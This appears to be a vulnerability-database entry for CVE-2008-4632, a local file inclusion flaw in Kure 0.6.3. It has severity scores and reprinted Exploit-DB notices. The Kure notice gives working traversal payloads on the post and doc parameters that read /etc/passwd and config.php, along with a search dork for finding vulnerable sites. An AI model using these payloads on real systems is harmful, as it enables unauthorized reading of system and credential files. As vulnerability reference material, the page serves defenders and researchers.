CVE-2008-4632
Published 2008-10-21
CVE-2008-4632: Multiple directory traversal vulnerabilities in index.php in Kure 0.6.3, when magic_quotes_gpc is disabled, allow remote attackers to read and possibly execute…
Priority P3 · 34 · medium · 6.8 (CVSS 2.0)
AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.93% (77.4th percentile)
Multiple directory traversal vulnerabilities in index.php in Kure 0.6.3, when magic_quotes_gpc is disabled, allow remote attackers to read and possibly execute arbitrary local files via a .. (dot dot) in the (1) post and (2) doc parameters.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| kure | kure | — | — |
No detection rules found.
Exploit-DB
ASPilot Pilot Cart 7.3 - Multiple Vulnerabilities
exploitdb·2010-11-07·CVSS 7.5
CVE-2010-4632 [HIGH] ASPilot Pilot Cart 7.3 - Multiple Vulnerabilities
---
# Title: [ASPilot Pilot Cart 7.3 multiple vulnerabilities]
# Date: [07.11.2010]
# Author: [Ariko-Security]
# Software Link: [http://www.pilotcart.com]
# Version: [7.3]
# CVE Reference: CVE-2008-2688 (only 1 SQL injection)
# EDB-ID: 5765 (only 1 SQL injection)
# Ariko-Security: Security Audits , Audyt bezpieczeństwa
# Advisory: 745/2010
============ { Ariko-Security - Advisory #1/11/2010 } =============
ASPilot Pilot Cart 7.3 multiple vulnerabilities
Vendor's Description of Software and demo:
# http://www.pilotcart.com
Dork:
# Powered by Pilot Cart V.7.3
Application Info:
# Name: Pilot Cart
# version last 7.3
Vulnerability Info:
# Type: multiple SQL injections, multiple XSS, multiple iFrame injections, multiple link injections
Exploit-DB
Kure 0.6.3 - 'index.php' Local File Inclusion
exploitdb·2008-10-16
CVE-2008-4632 Kure 0.6.3 - 'index.php' Local File Inclusion
---
# Kure 0.6.3 (index.php post,doc) Local File Inclusion Vulnerability
# url: http://code.google.com/p/kure/downloads/list
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purposes. Use it at your own risk.
# The author will not be responsible for any damage.
#
# *Requirements: magic_quotes_gpc = Off
LFI /etc/passwd:
/?post=../../../../../../../../../../../../../etc/passwd%00
/?doc=../../../../../../../../../../../../../etc/passwd%00
LFI /config.php:
/?post=../config.php%00
/?doc=../config.php%00
dork: "powered by kure"
have fun :D
# milw0rm.com [2008-10-16]
No writeups or analysis indexed.
http://securityreason.com/securityalert/4445
http://www.securityfocus.com/bid/31785
https://exchange.xforce.ibmcloud.com/vulnerabilities/45927
https://www.exploit-db.com/exploits/6767
Published: 2008-10-21